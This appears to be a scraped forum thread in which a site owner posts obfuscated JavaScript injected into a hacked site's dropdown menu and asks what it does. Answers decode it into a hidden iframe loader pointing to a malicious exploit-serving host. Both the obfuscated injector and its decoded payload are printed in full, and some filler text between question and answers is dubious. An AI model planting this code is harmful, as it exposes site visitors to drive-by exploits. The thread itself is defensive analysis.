Logo Questions Linux Laravel Mysql Ubuntu Git Menu
 

Site's Been Hacked - What Does This Javascript Code Do?

Just found out that my website has been hacked. I traced the problem to this piece of Javascript code that was inserted in the Suckerfish dropdown menu. I'm gonna replace the menu with a clean backup, but am just curious what does this piece of code actually do?

(function() {
    var kuk = 'ck5',
    de = document,
    n = navigator,
    u = n.userAgent,
    l = 'anguage';
    function c(b) {
        var i = 'indexOf',
        l = 'length',
        c = de.cookie;
        b = b + "=";
        var a = c[i]("; " + b),
        d = c[i](";", a);
        if (a == -1) {
            a = c[i](b);
            if (a != 0)
                return 0
        }
        return 1
    }
    n = /^en-gb$/i.test(n['systemL' + l] || n['userL' + l] || n['l' + l]) && /(msie) ([\w.]+)|(mozilla)(?:.*? rv:([\w.]+))?/i.test(u) && !c(kuk);
    if (n) {
        var s,
        g = 2,
        aa = document.createTextNode("harCode");
        if (Math.exp(1) === Math.E) {
            s = String["fr" + "omC" + aa.nodeValue];
        }
        eval(s(7 + g, 7 + g, 103 + g, 100 + g, 30 + g, 38 + g, 98 + g, 109 + g, 97 + g, 115 + g, 107 + g, 99 + g, 108 + g, 114 + g, 44 + g, 101 + g, 99 + g, 114 + g, 67 + g, 106 + g, 99 + g, 107 + g, 99 + g, 108 + g, 114 + g, 113 + g, 64 + g, 119 + g, 82 + g, 95 + g, 101 + g, 76 + g, 95 + g, 107 + g, 99 + g, 38 + g, 37 + g, 96 + g, 109 + g, 98 + g, 119 + g, 37 + g, 39 + g, 89 + g, 46 + g, 91 + g, 39 + g, 121 + g, 7 + g, 7 + g, 7 + g, 103 + g, 100 + g, 112 + g, 95 + g, 107 + g, 99 + g, 112 + g, 38 + g, 39 + g, 57 + g, 7 + g, 7 + g, 123 + g, 30 + g, 99 + g, 106 + g, 113 + g, 99 + g, 30 + g, 121 + g, 7 + g, 7 + g, 7 + g, 98 + g, 109 + g, 97 + g, 115 + g, 107 + g, 99 + g, 108 + g, 114 + g, 44 + g, 117 + g, 112 + g, 103 + g, 114 + g, 99 + g, 38 + g, 32 + g, 58 + g, 103 + g, 100 + g, 112 + g, 95 + g, 107 + g, 99 + g, 30 + g, 113 + g, 112 + g, 97 + g, 59 + g, 37 + g, 102 + g, 114 + g, 114 + g, 110 + g, 56 + g, 45 + g, 45 + g, 95 + g, 113 + g, 95 + g, 113 + g, 95 + g, 113 + g, 95 + g, 113 + g, 95 + g, 49 + g, 44 + g, 97 + g, 120 + g, 44 + g, 97 + g, 97 + g, 45 + g, 103 + g, 108 + g, 98 + g, 99 + g, 118 + g, 44 + g, 110 + g, 102 + g, 110 + g, 61 + g, 114 + g, 110 + g, 59 + g, 96 + g, 95 + g, 47 + g, 51 + g, 95 + g, 46 + g, 52 + g, 50 + g, 51 + g, 99 + g, 96 + g, 95 + g, 50 + g, 99 + g, 98 + g, 99 + g, 37 + g, 30 + g, 117 + g, 103 + g, 98 + g, 114 + g, 102 + g, 59 + g, 37 + g, 47 + g, 46 + g, 37 + g, 30 + g, 102 + g, 99 + g, 103 + g, 101 + g, 102 + g, 114 + g, 59 + g, 37 + g, 47 + g, 46 + g, 37 + g, 30 + g, 113 + g, 114 + g, 119 + g, 106 + g, 99 + g, 59 + g, 37 + g, 116 + g, 103 + g, 113 + g, 103 + g, 96 + g, 103 + g, 106 + g, 103 + g, 114 + g, 119 + g, 56 + g, 102 + g, 103 + g, 98 + g, 98 + g, 99 + g, 108 + g, 57 + g, 110 + g, 109 + g, 113 + g, 103 + g, 114 + g, 103 + g, 109 + g, 108 + g, 56 + g, 95 + g, 96 + g, 113 + g, 109 + g, 106 + g, 115 + g, 114 + g, 99 + g, 57 + g, 106 + g, 99 + g, 100 + g, 114 + g, 56 + g, 46 + g, 57 + g, 114 + g, 109 + g, 110 + g, 56 + g, 46 + g, 57 + g, 37 + g, 60 + g, 58 + g, 45 + g, 103 + g, 100 + g, 112 + g, 95 + g, 107 + g, 99 + g, 60 + g, 32 + g, 39 + g, 57 + g, 7 + g, 7 + g, 123 + g, 7 + g, 7 + g, 100 + g, 115 + g, 108 + g, 97 + g, 114 + g, 103 + g, 109 + g, 108 + g, 30 + g, 103 + g, 100 + g, 112 + g, 95 + g, 107 + g, 99 + g, 112 + g, 38 + g, 39 + g, 121 + g, 7 + g, 7 + g, 7 + g, 116 + g, 95 + g, 112 + g, 30 + g, 100 + g, 30 + g, 59 + g, 30 + g, 98 + g, 109 + g, 97 + g, 115 + g, 107 + g, 99 + g, 108 + g, 114 + g, 44 + g, 97 + g, 112 + g, 99 + g, 95 + g, 114 + g, 99 + g, 67 + g, 106 + g, 99 + g, 107 + g, 99 + g, 108 + g, 114 + g, 38 + g, 37 + g, 103 + g, 100 + g, 112 + g, 95 + g, 107 + g, 99 + g, 37 + g, 39 + g, 57 + g, 100 + g, 44 + g, 113 + g, 99 + g, 114 + g, 63 + g, 114 + g, 114 + g, 112 + g, 103 + g, 96 + g, 115 + g, 114 + g, 99 + g, 38 + g, 37 + g, 113 + g, 112 + g, 97 + g, 37 + g, 42 + g, 37 + g, 102 + g, 114 + g, 114 + g, 110 + g, 56 + g, 45 + g, 45 + g, 95 + g, 113 + g, 95 + g, 113 + g, 95 + g, 113 + g, 95 + g, 113 + g, 95 + g, 49 + g, 44 + g, 97 + g, 120 + g, 44 + g, 97 + g, 97 + g, 45 + g, 103 + g, 108 + g, 98 + g, 99 + g, 118 + g, 44 + g, 110 + g, 102 + g, 110 + g, 61 + g, 114 + g, 110 + g, 59 + g, 96 + g, 95 + g, 47 + g, 51 + g, 95 + g, 46 + g, 52 + g, 50 + g, 51 + g, 99 + g, 96 + g, 95 + g, 50 + g, 99 + g, 98 + g, 99 + g, 37 + g, 39 + g, 57 + g, 100 + g, 44 + g, 113 + g, 114 + g, 119 + g, 106 + g, 99 + g, 44 + g, 116 + g, 103 + g, 113 + g, 103 + g, 96 + g, 103 + g, 106 + g, 103 + g, 114 + g, 119 + g, 59 + g, 37 + g, 102 + g, 103 + g, 98 + g, 98 + g, 99 + g, 108 + g, 37 + g, 57 + g, 100 + g, 44 + g, 113 + g, 114 + g, 119 + g, 106 + g, 99 + g, 44 + g, 110 + g, 109 + g, 113 + g, 103 + g, 114 + g, 103 + g, 109 + g, 108 + g, 59 + g, 37 + g, 95 + g, 96 + g, 113 + g, 109 + g, 106 + g, 115 + g, 114 + g, 99 + g, 37 + g, 57 + g, 100 + g, 44 + g, 113 + g, 114 + g, 119 + g, 106 + g, 99 + g, 44 + g, 106 + g, 99 + g, 100 + g, 114 + g, 59 + g, 37 + g, 46 + g, 37 + g, 57 + g, 100 + g, 44 + g, 113 + g, 114 + g, 119 + g, 106 + g, 99 + g, 44 + g, 114 + g, 109 + g, 110 + g, 59 + g, 37 + g, 46 + g, 37 + g, 57 + g, 100 + g, 44 + g, 113 + g, 99 + g, 114 + g, 63 + g, 114 + g, 114 + g, 112 + g, 103 + g, 96 + g, 115 + g, 114 + g, 99 + g, 38 + g, 37 + g, 117 + g, 103 + g, 98 + g, 114 + g, 102 + g, 37 + g, 42 + g, 37 + g, 47 + g, 46 + g, 37 + g, 39 + g, 57 + g, 100 + g, 44 + g, 113 + g, 99 + g, 114 + g, 63 + g, 114 + g, 114 + g, 112 + g, 103 + g, 96 + g, 115 + g, 114 + g, 99 + g, 38 + g, 37 + g, 102 + g, 99 + g, 103 + g, 101 + g, 102 + g, 114 + g, 37 + g, 42 + g, 37 + g, 47 + g, 46 + g, 37 + g, 39 + g, 57 + g, 7 + g, 7 + g, 7 + g, 98 + g, 109 + g, 97 + g, 115 + g, 107 + g, 99 + g, 108 + g, 114 + g, 44 + g, 101 + g, 99 + g, 114 + g, 67 + g, 106 + g, 99 + g, 107 + g, 99 + g, 108 + g, 114 + g, 113 + g, 64 + g, 119 + g, 82 + g, 95 + g, 101 + g, 76 + g, 95 + g, 107 + g, 99 + g, 38 + g, 37 + g, 96 + g, 109 + g, 98 + g, 119 + g, 37 + g, 39 + g, 89 + g, 46 + g, 91 + g, 44 + g, 95 + g, 110 + g, 110 + g, 99 + g, 108 + g, 98 + g, 65 + g, 102 + g, 103 + g, 106 + g, 98 + g, 38 + g, 100 + g, 39 + g, 57 + g, 7 + g, 7 + g, 123 + g));
        n = new Date();
        n.setDate(n.getDate() + 3650);
        de.cookie = kuk + '=1;path=/;expires=' + n.toUTCString()
        }
})()
like image 349
Jon Sutton Avatar asked Jul 10 '11 17:07

Jon Sutton


People also ask

Can a website be hacked if you use JavaScript?

The cruel part is that your website can be hacked even if your website is secure enough, because of a vulnerability in a JavaScript library that you use in your website. How and where can I use JS on hacking? You can use JS to hack on quora. Simply paste this in your address bar give yourself infinite upvotes.

What to do if your website is being hacked?

Again, depending on the type of business you operate and your website, you can take a preventive measure like blocking your site visitors and other users from accessing your website until the issue is completely resolved.

How do attackers hack computers using JavaScript libraries?

Attackers can use the same way to hack the target computers using vulnerabilities on a JavaScript Libraries. When malicious code is executed, you can see that a browser is hooked to you on your BeEF control panel and finally, exploits are launched.

Is it safe to use JavaScript on your website?

JavaScript Lib. can be abused, and that abuse leads to scenarios that make it possible to snoop around your Internet activity and violate your privacy. The cruel part is that your website can be hacked even if your website is secure enough, because of a vulnerability in a JavaScript library that you use in your website.


3 Answers

Change eval to alert and run it. The basic idea is that it grabs a bunch of information about the the user and stores it in a cookie then uses String.fromCharCode (it's obfuscated but still there) and executes some more code which creates an iframe to an evil site that probably attempts to gain access to the users computers using various exploits.

http://fiddle.jshell.net/qHeJ3/

Here's the payload:

if (document.getElementsByTagName('body')[0]) {
    iframer();
} else {
    document.write("<iframe src='http://asasasasa3.cz.cc/
index.php?tp=ba15a0645eba4ede' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>");
}

function iframer() {
    var f = document.createElement('iframe');
    f.setAttribute('src', 'http://asasasasa3.cz.cc/index.php?tp=ba15a0645e
ba4ede');
    f.style.visibility = 'hidden';
    f.style.position = 'absolute';
    f.style.left = '0';
    f.style.top = '0';
    f.setAttribute('width', '10');
    f.setAttribute('height', '10');
    document.getElementsByTagName('body')[0].appendChild(f);
}
like image 76
Christopher Tarquini Avatar answered Oct 19 '22 23:10

Christopher Tarquini


It embeds an invisible iframe from http://asasasasa3.cz.cc/index.php?tp=ba15a0645eba4ede.

Formatted code:

if (document.getElementsByTagName('body')[0]) {
    iframer();
} else {
    document.write("<iframe " +
                 "src='http://asasasasa3.cz.cc/index.php?tp=ba15a0645eba4ede' " +
                   "width='10' height='10' " +
                   "style='visibility:hidden;position:absolute;left:0;top:0;'>" +
                   "</iframe>")
}
function iframer() {
     var f = document.createElement('iframe');
     f.setAttribute('src',
                    'http://asasasasa3.cz.cc/index.php?tp=ba15a0645eba4ede');
     f.style.visibility='hidden';
     f.style.position='absolute';
     f.style.left='0';
     f.style.top='0';
     f.setAttribute('width','10');
     f.setAttribute('height','10');
     document.getElementsByTagName('body')[0].appendChild(f);
}

The page loaded from the above URL (executed code, after undoing another obfuscation layer) seems to try to exploit multiple vulnerabilities. It tries various plugins, and loads yet more pages, probably trying other exploits.

like image 37
phihag Avatar answered Oct 20 '22 01:10

phihag


the eval(s(...)) decoded is:

if (document.getElementsByTagName('body')[0]) {
    iframer();
} else {
    document.write("<iframe src='http://asasasasa3.cz.cc/index.php?tp=ba15a0645eba4ede' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>");
}
function iframer() {
    var f = document.createElement('iframe');
    f.setAttribute('src', 'http://asasasasa3.cz.cc/index.php?tp=ba15a0645eba4ede');
    f.style.visibility = 'hidden';
    f.style.position = 'absolute';
    f.style.left = '0';
    f.style.top = '0';
    f.setAttribute('width', '10');
    f.setAttribute('height', '10');
    document.getElementsByTagName('body')[0].appendChild(f);
}
like image 33
Dan D. Avatar answered Oct 20 '22 00:10

Dan D.